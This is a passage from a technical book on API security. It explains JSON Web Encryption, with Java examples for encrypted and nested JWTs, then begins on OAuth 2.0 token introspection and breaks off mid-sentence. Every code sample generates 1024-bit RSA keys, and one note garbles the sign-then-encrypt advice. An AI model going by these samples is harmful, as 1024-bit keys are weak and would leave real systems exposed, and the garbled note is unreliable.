eve in the middle can’t see what’s inside it. but, eve can modify the bit stream of the encrypted data to change the message, let’s say from us $100 to us Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 192 $150. the bank which controls the transaction would not detect this change done by eve in the middle and will treat it as a legitimate transaction. this is why encryption itself is not always safe, and in the 1970s, this was identified as an issue in the banking industry. unlike just encryption, the Authenticated Encryption simultaneously provides a confidentiality, integrity, and authenticity guarantee for data. isO/ieC 19772:2009 has standardized six different authenticated encryption modes: gCM, OCb 2.0, CCM, Key wrap, eaX, and encrypt- then- MaC. Authenticated Encryption with Associated Data (AEAD) extends this model to add the ability to preserve the integrity and authenticity of Additional Authenticated Data (aaD) that isn’t encrypted. aaD is also known as Associated Data (aD). aeaD algorithms take two inputs, plaintext to be encrypted and the additional authentication Data (aaD), and result in two outputs: the ciphertext and the authentication tag. the aaD represents the data to be authenticated, but not encrypted. the authentication tag ensures the integrity of the ciphertext and the aaD. Let’s look at the following JOSE header. For content encryption, it uses A256GCM algorithm, and for key wrapping, RSA-OAEP: {"alg":"RSA-OAEP","enc":"A256GCM"} A256GCM is defined in the JWA specification. It uses the Advanced Encryption Standard (AES) in Galois/Counter Mode (GCM) algorithm with a 256-bit long key, and it’s a symmetric key algorithm used for AEAD. Symmetric keys are mostly used for content encryption. Symmetric key encryption is much faster than asymmetric key encryption. At the same time, asymmetric key encryption can’t be used to encrypt large messages. RSA-OAEP is too defined in the JWA specification. During the encryption process, the token issuer generates a random key, which is 256 bits in size, and encrypts the message using that key following the AES GCM algorithm. Next, the key used to encrypt the message is encrypted using RSA- OAEP,6 which is an asymmetric encryption scheme. The RSA-OAEP encryption scheme uses RSA algorithm with the Optimal Asymmetric Encryption Padding (OAEP) method. Finally, the encrypted symmetric key is placed in the JWE Encrypted Header section of the JWE. 6 RSA-OAEP is a public key encryption scheme, which uses the RSA algorithm with the Optimal Asymmetric Encryption Padding (OAEP) method. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 193 KEY MANAGEMENT MODES the key management mode defines the method to derive or compute a value to the Content encryption Key (CeK). the Jwe specification employs five key management modes, as listed in the following, and the appropriate key management mode is decided based on the alg parameter, which is defined in the JOse header: 1. Key encryption: with the key encryption mode, the value of the CeK is encrypted using an asymmetric encryption algorithm. For example, if the value of the alg parameter in the JOse header is rsa-Oaep, then the corresponding key management algorithm is the rsaes Oaep using the default parameters. this relationship between the alg parameter and the key management algorithm is defined in the Jwa specification. the rsaes Oaep algorithm occupies the key encryption as the key management mode to derive the value of the CeK. 2. Key wrapping: with the key wrapping mode, the value of the CeK is encrypted using a symmetric key wrapping algorithm. For example, if the value of the alg parameter in the JOse header is a128Kw, then the corresponding key management algorithm is the aes Key wrap with the default initial value, which uses a 128- bit key. the aes Key wrap algorithm occupies the key wrapping as the key management mode to derive the value of the CeK. 3. Direct key agreement: with the direct key agreement mode, the value of the CeK is decided based upon a key agreement algorithm. For example, if the value of the alg parameter in the JOse header is eCDh-es, then the corresponding key management algorithm is the elliptic Curve Diffie-hellman ephemeral static key agreement using Concat KDF. this algorithm occupies the direct key agreement as the key management mode to derive the value of the CeK. 4. Key agreement with key wrapping: with the direct key agreement with key wrapping mode, the value of the CeK is decided based upon a key agreement algorithm, and it is encrypted using a symmetric key wrapping algorithm. For example, if the value of the alg parameter in the JOse header is eCDh- es+a128Kw, then the corresponding key management algorithm is the eCDh- es using Concat KDF and CeK rapped with a128Kw. this algorithm occupies the direct key agreement with key wrapping as the key management mode to derive the value of the CeK. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 194 5. Direct encryption: with the direct encryption mode, the value of the CeK is the same as the symmetric key value, which is already shared between the token issuer and the recipient. For example, if the value of the alg parameter in the JOse header is dir, then the direct encryption is occupied as the key management mode to derive the value of the CeK. JWE Initialization Vector Some encryption algorithms, which are used for content encryption, require an initialization vector, during the encryption process. Initialization vector is a randomly generated number, which is used along with a secret key to encrypt data. This will add randomness to the encrypted data, which will prevent repetition even if the same data gets encrypted using the same secret key again and again. To decrypt the message at the token recipient end, it has to know the initialization vector, hence included in the JWE token, under the JWE Initialization Vector element. If the content encryption algorithm does not require an initialization vector, then the value of this element should be kept empty. JWE Ciphertext The fourth element of the JWE token is the base64url-encoded value of the JWE ciphertext. The JWE ciphertext is computed by encrypting the plaintext JSON payload using the CEK, the JWE Initialization Vector, and the Additional Authentication Data (AAD) value, with the encryption algorithm defined by the header parameter enc. The algorithm defined by the enc header parameter should be a symmetric Authenticated Encryption with Associated Data (AEAD) algorithm. The AEAD algorithm, which is used to encrypt the plaintext payload, also allows specifying Additional Authenticated Data (AAD). JWE Authentication Tag The base64url-encoded value of the JWE Authentication Tag is the final element of the JWE token. The value of the authentication tag is produced during the AEAD encryption process, along with the ciphertext. The authentication tag ensures the integrity of the ciphertext and the Additional Authenticated Data (AAD). Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 195 The Process of Encryption (Compact Serialization) We have discussed about all the ingredients that are required to build a JWE token under compact serialization. The following discusses the steps involved in building the JWE token. There are five elements in a JWE token; the first element is produced by step 6, the second element is produced by step 3, the third element is produced by step 4, the fourth element is produced by step 10, and the fifth element is produced by step 11. 1. Figure out the key management mode by the algorithm used to determine the Content Encryption Key (CEK) value. This algorithm is defined by the alg parameter in the JOSE header. There is only one alg parameter per JWE token. 2. Compute the CEK and calculate the JWE Encrypted Key based on the key management mode, picked in step 1. The CEK is later used to encrypt the JSON payload. There is only one JWE Encrypted Key element in the JWE token. 3. Compute the base64url-encoded value of the JWE Encrypted Key, which is produced by step 2. This is the second element of the JWE token. 4. Generate a random value for the JWE Initialization Vector. Irrespective of the serialization technique, the JWE token carries the value of the base64url-encoded value of the JWE Initialization Vector. This is the third element of the JWE token. 5. If token compression is needed, the JSON payload in plaintext must be compressed following the compression algorithm defined under the zip header parameter. 6. Construct the JSON representation of the JOSE header and find the base64url- encoded value of the JOSE header with UTF-8 encoding. This is the first element of the JWE token. 7. To encrypt the JSON payload, we need the CEK (which we already have), the JWE Initialization Vector (which we already have), and the Additional Authenticated Data (AAD). Compute ASCII value of the encoded JOSE header (step 6) and use it as the AAD. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 196 8. Encrypt the compressed JSON payload (from step 5) using the CEK, the JWE Initialization Vector, and the Additional Authenticated Data (AAD), following the content encryption algorithm defined by the enc header parameter. 9. The algorithm defined by the enc header parameter is an AEAD algorithm, and after the encryption process, it produces the ciphertext and the Authentication Tag. 10. Compute the base64url-encoded value of the ciphertext, which is produced by step 9. This is the fourth element of the JWE token. 11. Compute the base64url-encoded value of the Authentication Tag, which is produced by step 9. This is the fifth element of the JWE token. 12. Now we have all the elements to build the JWE token in the following manner. The line breaks are introduced only for clarity. BASE64URL-ENCODE(UTF8(JWE Protected Header)). BASE64URL-ENCODE(JWE Encrypted Key). BASE64URL-ENCODE(JWE Initialization Vector). BASE64URL-ENCODE(JWE Ciphertext). BASE64URL-ENCODE(JWE Authentication Tag) JWE JSON Serialization Unlike the JWE compact serialization, the JWE JSON serialization can produce encrypted data targeting at multiple recipients over the same JSON payload. The ultimate serialized form under JWE JSON serialization represents an encrypted JSON payload as a JSON object. This JSON object includes six top-level elements: protected, unprotected, recipients, iv, ciphertext, and tag. The following is an example of a JWE token, which is serialized with JWE JSON serialization: Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 197 { "protected":"eyJlbmMiOiJBMTI4Q0JDLUhTMjU2In0", "unprotected":{"jku":"https://server.example.com/keys.jwks"}, "recipients":[ { "header":{"alg":"RSA1_5","kid":"2011-04-29"}, "encrypted_key":"UGhIOguC7IuEvf_NPVaXsGMoLOmwvc1GyqlIK..." }, { "header":{"alg":"A128KW","kid":"7"}, "encrypted_key":"6KB707dM9YTIgHtLvtgWQ8mKwb..." } ], "iv":"AxY8DCtDaGlsbGljb3RoZQ", "ciphertext":"KDlTtXchhZTGufMYmOYGS4HffxPSUrfmqCHXaI9wOGY", "tag":"Mz-VPPyU4RlcuYv1IwIvzw" } JWE Protected Header The JWE Protected Header is a JSON object that includes the header parameters that have to be integrity protected by the AEAD algorithm. The parameters inside the JWE Protected Header are applicable to all the recipients of the JWE token. The protected parameter in the serialized JSON form represents the base64url-encoded value of the JWE Protected Header. There is only one protected element in a JWE token at the root level, and any header parameter that we discussed before under the JOSE header can also be used under the JWE Protected Header. JWE Shared Unprotected Header The JWE Shared Unprotected Header is a JSON object that includes the header parameters that are not integrity protected. The unprotected parameter in the serialized JSON form represents the JWE Shared Unprotected Header. There is only one unprotected element in a JWE token at the root level, and any header parameter that we discussed before under the JOSE header can also be used under the JWE Shared Unprotected Header. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 198 JWE Per-Recipient Unprotected Header The JWE Per-Recipient Unprotected Header is a JSON object that includes the header parameters that are not integrity protected. The parameters inside the JWE Per-Recipient Unprotected Header are applicable only to a particular recipient of the JWE token. In the JWE token, these header parameters are grouped under the parameter recipients. The recipients parameter represents an array of recipients of the JWE token. Each member consists of a header parameter and an encryptedkey parameter. • header: The header parameter, which is inside the recipients parameter, represents the value of the JWE header elements that aren’t protected for integrity by authenticated encryption for each recipient. • encryptedkey: The encryptedkey parameter represents the base64url-encoded value of the encrypted key. This is the key used to encrypt the message payload. The key can be encrypted in different ways for each recipient. Any header parameter that we discussed before under the JOSE header can also be used under the JWE Per-Recipient Unprotected Header. JWE Initialization Vector This carries the same meaning as explained under JWE compact serialization previously in this chapter. The iv parameter in the JWE token represents the value of the initialization vector used for encryption. JWE Ciphertext This carries the same meaning as explained under JWE compact serialization previously in this chapter. The ciphertext parameter in the JWE token carries the base64url- encoded value of the JWE ciphertext. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 199 JWE Authentication Tag This carries the same meaning as explained under JWE compact serialization previously in this chapter. The tag parameter in the JWE token carries the base64url-encoded value of the JWE Authentication Tag, which is an outcome of the encryption process using an AEAD algorithm. The Process of Encryption (JSON Serialization) We have discussed about all the ingredients that are required to build a JWE token under JSON serialization. The following discusses the steps involved in building the JWE token. 1. Figure out the key management mode by the algorithm used to determine the Content Encryption Key (CEK) value. This algorithm is defined by the alg parameter in the JOSE header. Under JWE JSON serialization, the JOSE header is built by the union of all the parameters defined under the JWE Protected Header, JWE Shared Unprotected Header, and Per-Recipient Unprotected Header. Once included in the Per-Recipient Unprotected Header, the alg parameter can be defined per recipient. 2. Compute the CEK and calculate the JWE Encrypted Key based on the key management mode, picked in step 1. The CEK is later used to encrypt the JSON payload. 3. Compute the base64url-encoded value of the JWE Encrypted Key, which is produced by step 2. Once again, this is computed per recipient, and the resultant value is included in the Per-Recipient Unprotected Header parameter, encryptedkey. 4. Perform steps 1–3 for each recipient of the JWE token. Each iteration will produce an element in the recipients JSON array of the JWE token. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 200 5. Generate a random value for the JWE Initialization Vector. Irrespective of the serialization technique, the JWE token carries the value of the base64url-encoded value of the JWE Initialization Vector. 6. If token compression is needed, the JSON payload in plaintext must be compressed following the compression algorithm defined under the zip header parameter. The value of the zip header parameter can be defined either in the JWE Protected Header or JWE Shared Unprotected Header. 7. Construct the JSON representation of the JWE Protected Header, JWE Shared Unprotected Header, and Per-Recipient Unprotected Headers. 8. Compute the base64url-encoded value of the JWE Protected Header with UTF-8 encoding. This value is represented by the protected element in the serialized JWE token. The JWE Protected Header is optional, and if present there can be only one header. If no JWE header is present, then the value of the protected element will be empty. 9. Generate a value for the Additional Authenticated Data (AAD) and compute the base64url-encoded value of it. This is an optional step, and if it’s there, then the base64url-encoded AAD value will be used as an input parameter to encrypt the JSON payload, as in step 10. 10. To encrypt the JSON payload, we need the CEK (which we already have), the JWE Initialization Vector (which we already have), and the Additional Authenticated Data (AAD). Compute ASCII value of the encoded JWE Protected Header (step 8) and use it as the AAD. In case step 9 is done and then the value of AAD is computed as ASCII(encoded JWE Protected Header. BASE64URL- ENCODE(AAD)). 11. Encrypt the compressed JSON payload (from step 6) using the CEK, the JWE Initialization Vector, and the Additional Authenticated Data (AAD from step 10), following the content encryption algorithm defined by the enc header parameter. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 201 12. The algorithm defined by the enc header parameter is an AEAD algorithm, and after the encryption process, it produces the ciphertext and the Authentication Tag. 13. Compute the base64url-encoded value of the ciphertext, which is produced by step 12. 14. Compute the base64url-encoded value of the Authentication Tag, which is produced by step 12. Now we have all the elements to build the JWE token under JSON serialization. Note the XML encryption specification by w3C only talks about encrypting an XML payload. if you have to encrypt any content, then first you need to embed that within an XML payload and then encrypt. in contrast, the Jwe specification is not just limited to JsON. you can encrypt any content with Jwe without wrapping it inside a JsON payload. Nested JWTs Both in a JWS token and a JWE token, the payload can be of any content. It can be JSON, XML, or anything. In a Nested JWT, the payload must be a JWT itself. In other words, a JWT, which is enclosed in another JWS or JWE token, builds a Nested JWT. A Nested JWT is used to perform nested signing and encryption. The cty header parameter must be present and set to the value JWT, in the case of a Nested JWT. The following lists out the steps in building a Nested JWT, which signs a payload first using JWS and then encrypts the JWS token using JWE: 1. Build the JWS token with the payload or the content of your choice. 2. Based on the JWS serialization technique you use, step 1 will produce either a JSON object with JSON serialization or a three- element string where each element is separated out by a period (.)—with compact serialization. 3. Base64url-encode the output from step 2 and use it as the payload to be encrypted for the JWE token. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 202 4. Set the value of the cty header parameter of the JWE JOSE header to JWT. 5. Build the JWE following any of the two serialization techniques defined in the JWE specification. Note sign first and then encrypt is the preferred approach in building a nested Jwt, instead of sign and then encrypt. the signature binds the ownership of the content to the signer or the token issuer. it is an industry accepted best practice to sign the original content, rather than the encrypted content. also, when sign first and encrypt the signed payload, the signature itself gets encrypted too, preventing an attacker in the middle stripping off the signature. since the signature and all its related metadata are encrypted, an attacker cannot derive any details about the token issuer looking at the message. when encrypt first and sign the encrypted payload, then the signature is visible to anyone and also an attacker can strip it off from the message. JWE VS. JWS From an application developer’s point of view, it may be quite important to identify whether a given message is a Jwe token or a Jws token and start processing based on that. the following lists out a few techniques that can be used to differentiate a Jws token from a Jwe token: 1. when compact serialization is used, a Jws token has three base64url-encoded elements separated by periods (.), while a Jwe token has five base64url- encoded elements separated by periods (.). 2. when JsON serialization is used, the elements of the JsON object produced are different in Jws token and Jwe token. For example, the Jws token has a top-level element called payload, which is not in the Jwe token, and the Jwe token has a top-level element called ciphertext, which is not in the Jws token. 3. the JOse header of a Jwe token has the enc header parameter, while it is not present in the JOse header of a Jws token. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 203 4. the value of the alg parameter in the JOse header of a Jws token carries a digital signature or a MaC algorithm or none, while the same parameter in the JOse header of a Jwe token carries a key encryption, key wrapping, direct key agreement, key agreement with key wrapping, or direct encryption algorithm. GENERATING A JWE TOKEN WITH RSA-OAEP AND AES WITH A JSON PAYLOAD the following Java code generates a Jwe token with rsa-Oaep and aes. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/ samples/tree/master/ch08/sample01—and it runs on Java 8+. First you need to invoke the method generateKeyPair() and pass the PublicKey(generateKeyPair(). getPublicKey()) into the method buildEncryptedJWT(): // this method generates a key pair and the corresponding public key is used // to encrypt the message. public static KeyPair generateKeyPair() throws NoSuchAlgorithmException { // instantiate KeyPairGenerate with RSA algorithm. KeyPairGenerator keyGenerator = KeyPairGenerator.getInstance("RSA"); // set the key size to 1024 bits. keyGenerator.initialize(1024); // generate and return private/public key pair. return keyGenerator.genKeyPair(); } // this method is used to encrypt a JWT claims set using the provided public // key. public static String buildEncryptedJWT(PublicKey publicKey) throws JOSEException { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). // set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to this subject. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 204 subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 ∗ 60 ∗ 10)). // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT identifier. jwtID(UUID.randomUUID().toString()).build(); // create JWE header with RSA-OAEP and AES/GCM. JWEHeader jweHeader = new JWEHeader(JWEAlgorithm.RSA_OAEP, EncryptionMethod.A128GCM); // create encrypter with the RSA public key. JWEEncrypter encrypter = new RSAEncrypter((RSAPublicKey) publicKey); // create the encrypted JWT with the JWE header and the JWT payload. EncryptedJWT encryptedJWT = new EncryptedJWT(jweHeader, jwtClaims); // encrypt the JWT. encryptedJWT.encrypt(encrypter); // serialize into base64-encoded text. String jwtInText = encryptedJWT.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } the following Java code shows how to invoke the previous two methods: KeyPair keyPair = generateKeyPair(); buildEncryptedJWT(keyPair.getPublic()); to build and run the program, execute the following Maven command from the ch08/ sample01 directory. \> mvn test -psample01 Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 205 Let’s see how to decrypt a Jwt encrypted by rsa-Oaep. you need to know the PrivateKey corresponding to the PublicKey used to encrypt the message: public static void decryptJWT() throws NoSuchAlgorithmException, JOSEException, ParseException { // generate private/public key pair. KeyPair keyPair = generateKeyPair(); // get the private key - used to decrypt the message. PrivateKey privateKey = keyPair.getPrivate(); // get the public key - used to encrypt the message. PublicKey publicKey = keyPair.getPublic(); // get encrypted JWT in base64-encoded text. String jwtInText = buildEncryptedJWT(publicKey); // create a decrypter. JWEDecrypter decrypter = new RSADecrypter((RSAPrivateKey) privateKey); // create the encrypted JWT with the base64-encoded text. EncryptedJWT encryptedJWT = EncryptedJWT.parse(jwtInText); // decrypt the JWT. encryptedJWT.decrypt(decrypter); // print the value of JOSE header. System.out.println("JWE Header:" + encryptedJWT.getHeader()); // JWE content encryption key. System.out.println("JWE Content Encryption Key: " + encryptedJWT. getEncryptedKey()); // initialization vector. System.out.println("Initialization Vector: " + encryptedJWT.getIV()); // ciphertext. System.out.println("Ciphertext : " + encryptedJWT.getCipherText()); // authentication tag. System.out.println("Authentication Tag: " + encryptedJWT.getAuthTag()); // print the value of JWT body System.out.println("Decrypted Payload: " + encryptedJWT.getPayload()); } the preceding code produces something similar to the following output: JWE Header: {"alg":"RSA-OAEP","enc":"A128GCM"} JWE Content Encryption Key: NbIuAjnNBwmwlbKiIpEzffU1duaQfxJpJaodkxDj SC2s3tO76ZdUZ6YfPrwSZ6DU8F51pbEw2f2MK_C7kLpgWUl8hMHP7g2_Eh3y Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 206 Th5iK6Agx72o8IPwpD4woY7CVvIB_iJqz-cngZgNAikHjHzOC6JF748MwtgSiiyrI 9BsmU Initialization Vector: JPPFsk6yimrkohJf Ciphertext: XF2kAcBrAX_4LSOGejsegoxEfb8kV58yFJSQ0_WOONP5wQ07HG mMLTyR713ufXwannitR6d2eTDMFe1xkTFfF9ZskYj5qJ36rOvhGGhNqNdGEpsB YK5wmPiRlk3tbUtd_DulQWEUKHqPc_VszWKFOlLQW5UgMeHndVi3JOZgiwN gy9bvzacWazK8lTpxSQVf-NrD_zu_qPYJRisvbKI8dudv7ayKoE4mnQW_fUY-U10 AMy-7Bg4WQE4j6dfxMlQGoPOo Authentication Tag: pZWfYyt2kO-VpHSW7btznA Decrypted Payload: { "exp":1402116034, "sub":"john", "nbf":1402115434, "aud":["https:\/\/app1.foo.com "," https:\/\/app2.foo.com"], "iss":"https:\/\/apress.com", "jti":"a1b41dd4-ba4a-4584-b06d-8988e8f995bf", "iat":1402115434 } GENERATING A JWE TOKEN WITH RSA-OAEP AND AES WITH A NON-JSON PAYLOAD the following Java code generates a Jwe token with rsa-Oaep and aes for a non- JsON payload. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/samples/tree/master/ch08/sample02— and it runs on Java 8+. First you need to invoke the method generateKeyPair() and pass the PublicKey(generateKeyPair().getPublicKey()) into the method buildEncryptedJWT(): // this method generates a key pair and the corresponding public key is used // to encrypt the message. public static KeyPair generateKeyPair() throws NoSuchAlgorithmException, JOSEException { // instantiate KeyPairGenerate with RSA algorithm. KeyPairGenerator keyGenerator = KeyPairGenerator.getInstance("RSA"); // set the key size to 1024 bits. keyGenerator.initialize(1024); Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 207 // generate and return private/public key pair. return keyGenerator.genKeyPair(); } // this method is used to encrypt a non-JSON payload using the provided // public key. public static String buildEncryptedJWT(PublicKey publicKey) throws JOSEException { // create JWE header with RSA-OAEP and AES/GCM. JWEHeader jweHeader = new JWEHeader(JWEAlgorithm.RSA_OAEP, EncryptionMethod.A128GCM); // create encrypter with the RSA public key. JWEEncrypter encrypter = new RSAEncrypter((RSAPublicKey) publicKey); // create a JWE object with a non-JSON payload JWEObject jweObject = new JWEObject(jweHeader, new Payload("Hello world!")); // encrypt the JWT. jweObject.encrypt(encrypter); // serialize into base64-encoded text. String jwtInText = jweObject.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } to build and run the program, execute the following Maven command from the ch08/ sample02 directory. \> mvn test -Psample02 GENERATING A NESTED JWT the following Java code generates a nested Jwt with rsa-Oaep and aes for encryption and hMaC-sha256 for signing. the nested Jwt is constructed by encrypting the signed Jwt. you can download the complete Java sample as a Maven project from https://github.com/ apisecurity/samples/tree/master/ch08/sample03—and it runs on Java 8+. First you need to invoke the method buildHmacSha256SignedJWT() with a shared secret and Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 208 pass its output along with the generateKeyPair().getPublicKey() into the method buildNestedJwt(): // this method generates a key pair and the corresponding public key is used // to encrypt the message. public static KeyPair generateKeyPair() throws NoSuchAlgorithmException { // instantiate KeyPairGenerate with RSA algorithm. KeyPairGenerator keyGenerator = KeyPairGenerator.getInstance("RSA"); // set the key size to 1024 bits. keyGenerator.initialize(1024); // generate and return private/public key pair. return keyGenerator.genKeyPair(); } // this method is used to sign a JWT claims set using the provided shared // secret. public static SignedJWT buildHmacSha256SignedJWT(String sharedSecretString) throws JOSEException { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). // set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to this subject. subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 ∗ 60 ∗ 10)). // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT identifier. jwtID(UUID.randomUUID().toString()).build(); Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 209 // create JWS header with HMAC-SHA256 algorithm. JWSHeader jswHeader = new JWSHeader(JWSAlgorithm.HS256); // create signer with the provider shared secret. JWSSigner signer = new MACSigner(sharedSecretString); // create the signed JWT with the JWS header and the JWT body. SignedJWT signedJWT = new SignedJWT(jswHeader, jwtClaims); // sign the JWT with HMAC-SHA256. signedJWT.sign(signer); // serialize into base64-encoded text. String jwtInText = signedJWT.serialize(); // print the value of the JWT. System.out.println(jwtInText); return signedJWT; } // this method is used to encrypt the provided signed JWT or the JWS using // the provided public key. public static String buildNestedJWT(PublicKey publicKey, SignedJWT signedJwt) throws JOSEException { // create JWE header with RSA-OAEP and AES/GCM. JWEHeader jweHeader = new JWEHeader(JWEAlgorithm.RSA_OAEP, EncryptionMethod.A128GCM); // create encrypter with the RSA public key. JWEEncrypter encrypter = new RSAEncrypter((RSAPublicKey) publicKey); // create a JWE object with the passed SignedJWT as the payload. JWEObject jweObject = new JWEObject(jweHeader, new Payload(signedJwt)); // encrypt the JWT. jweObject.encrypt(encrypter); // serialize into base64-encoded text. String jwtInText = jweObject.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } to build and run the program, execute the following Maven command from the ch08/ sample03 directory. \> mvn test -psample03 Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 210 Summary • The JWE specification standardizes the way to represent encrypted content in a cryptographically safe manner. • JWE defines two serialized forms to represent the encrypted payload: the JWE compact serialization and JWE JSON serialization. • In the JWE compact serialization, a JWE token is built with five components, each separated by a period (.): JOSE header, JWE Encrypted Key, JWE Initialization Vector, JWE Ciphertext, and JWE Authentication Tag. • The JWE JSON serialization can produce encrypted data targeting at multiple recipients over the same payload. • In a Nested JWT, the payload must be a JWT itself. In other words, a JWT, which is enclosed in another JWS or JWE token, builds a Nested JWT. • A Nested JWT is used to perform nested signing and encryption. Chapter 8 Message-LeveL seCurity with JsON web eNCryptiON 211 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_9 CHAPTER 9 OAuth 2.0 Profiles OAuth 2.0 is a framework for delegated authorization. It doesn’t address all specific enterprise API security use cases. The OAuth 2.0 profiles built on top of the core framework build a security ecosystem to make OAuth 2.0 ready for enterprise grade deployments. OAuth 2.0 introduced two extension points via grant types and token types. The profiles for OAuth 2.0 are built on top of this extensibility. This chapter talks about five key OAuth 2.0 profiles for token introspection, chained API invocation, dynamic client registration, and token revocation. Token Introspection OAuth 2.0 doesn’t define a standard API for communication between the resource server and the authorization server. As a result, vendor-specific, proprietary APIs have crept in to couple the resource server to the authorization server. The Token Introspection profile1 for OAuth 2.0 fills this gap by proposing a standard API to be exposed by the authorization server (Figure 9-1), allowing the resource server to talk to it and retrieve token metadata. 1 https://tools.ietf.org/html/rfc7662 212 Any party in possession of the access token can generate a token introspection request. The introspection endpoint can be secured and the popular options are mutual Transport Layer Security (mTLS) and OAuth 2.0 client credentials. POST /introspection HTTP/1.1 Accept: application/x-www-form-urlencoded Host: authz.server.com Authorization: Basic czZCaGRSa3F0Mzo3RmpmcDBaQnIxS3REUmJuZlZkbUl3 token=X3241Affw.423399JXJ& token_type_hint=access_token& Let’s examine the definition of each parameter: • token: The value of the access_token or the refresh_token. This is the token where we need to get metadata about. • token_type_hint: The type of the token (either the access_token or the refresh_token). This is optional and the value passed here could optimize the authorization server’s operations in generating the introspection response. This request returns the following JSON response. The following response does not show all possible parameters that an introspection response could include: HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store Figure 9-1. OAuth 2.0 Token Introspection Chapter 9 Oauth 2.0 prOfiles 213 { "active": true, "client_id":"s6BhdRkqt3", "scope": "read write dolphin", "sub": "2309fj32kl", "aud": "http://my-resource/∗" } Let’s examine the definition of the key parameters that you could expect in an introspection response: • active: Indicates whether the token is active. To be active, the token should not be expired or revoked. The authorization server can define its own criteria for how to define active. This is the only required parameter the introspection response must include. All the others are optional. • client_id: The identifier of the client to which the authorization server issued this token. • scope: Approved scopes associated with the token. The resource server must validate that the scopes required to access the API are at least a subset of scopes attached to the token. • sub: The subject identifier of the user who approved the authorization grant or in other words an identifier for the user who this token represents. This identifier is not necessarily a human-readable identifier, but it must carry a unique value all the time. The authorization server may produce a unique subject for each authorization server/resource server combination. This is implementation specific, and to support this, the authorization server must uniquely identify the resource server. In terms of privacy, it is essential that the authorization server maintains different subject identifiers by resource server, and this kind of an identifier is known as a persistence pseudonym. Since the authorization server issues different pseudonyms for different resource servers, for a given user, these resource servers together won’t be able to identify what other services this user accesses. Chapter 9 Oauth 2.0 prOfiles 214 • username: Carries a human-readable identifier of the user who approved the authorization grant or in other words a human- readable identifier for the user who this token represents. If you are to persist anything at the resource server end, with respect to the user, username is not the right identifier. The value of the username can change time to time, based on how it is implemented at the authorization server end. • aud: The allowed audience for the token. Ideally, this should carry an identifier that represents the corresponding resource server. If it does not match with your identifier, the resource server must immediately reject the token. This aud element can carry more than one identifier, and in that case you need to see whether your resource server’s one is part of it. Also in some implementations, rather than doing one-to- one string match, you can also match against a regular expression. For example, http://∗.my-resource.com will find a match for both the resource servers carrying the identifiers http://foo.my- resource.com and http://bar.my-resource.com. Note the audience (aud) parameter is defined in the Oauth 2.0: audience information internet draft available at http://tools.ietf.org/html/draft- tschofenig- oauth-audience-00. this is a new parameter introduced into the Oauth token request flow and is independent of the token type. • exp: Defines in seconds from January 1, 1970, in UTC, the expiration time of the token. This looks like redundant, as the active parameter is already there in the response. But resource server can utilize this parameter to optimize how frequently it wants to talk to the introspection endpoint of the authorization server. Since the call to the introspection endpoint is remote, there can be performance issues, and also it can be down due to some reason. In that case, the resource server can have a cache to carry the introspection responses, and when it gets the same token again and again, it can check the cache, and if the token has not expired, it can accept the token as valid. Also there should be a valid cache expiration time; Chapter 9 Oauth 2.0 prOfiles 215 otherwise, even if the token is revoked at the authorization server, the resource server will not know about it. • iat: Defines in seconds from January 1, 1970, in UTC, the issued time of the token. • nbf: Defines in seconds from January 1, 1970, in UTC, the time before the token should not be used. • token_type: Indicates the type of the token. It can be a bearer token, a MAC token (see Appendix G), or any other type. • iss: Carries an identifier that represents the issuer of the token. A resource server can accept tokens from multiple issuers (or authorization servers). If you store the subject of the token at the resource server end, it becomes unique only with the issuer. So you need to store it along with the issuer. There can be a case where the resource server connects to a multitenanted authorization server. In that case, your introspection endpoint will be the same, but it will be different issuers who issue tokens under different tenants. • jti: This is a unique identifier for the token, issued by the authorization server. The jti is mostly used when the access token the authorization server issues is a JWT or a self-contained access token. This is useful to avoid replaying access tokens. While validating the response from the introspection endpoint, the resource server should first check whether the value of active is set to true. Then it should check whether the value of aud in the response matches the aud URI associated with the resource server or the resource. Finally, it can validate the scope. The required scope to access the resource should be a subset of the scope values returned in the introspection response. If the resource server wants to do further access control based on the client or the resource owner, it can do so with respect to the values of sub and client_id. Chain Grant Type Once the audience restriction is enforced on OAuth tokens, they can only be used against the intended audience. You can access an API with an access token that has an audience restriction corresponding to that API. If 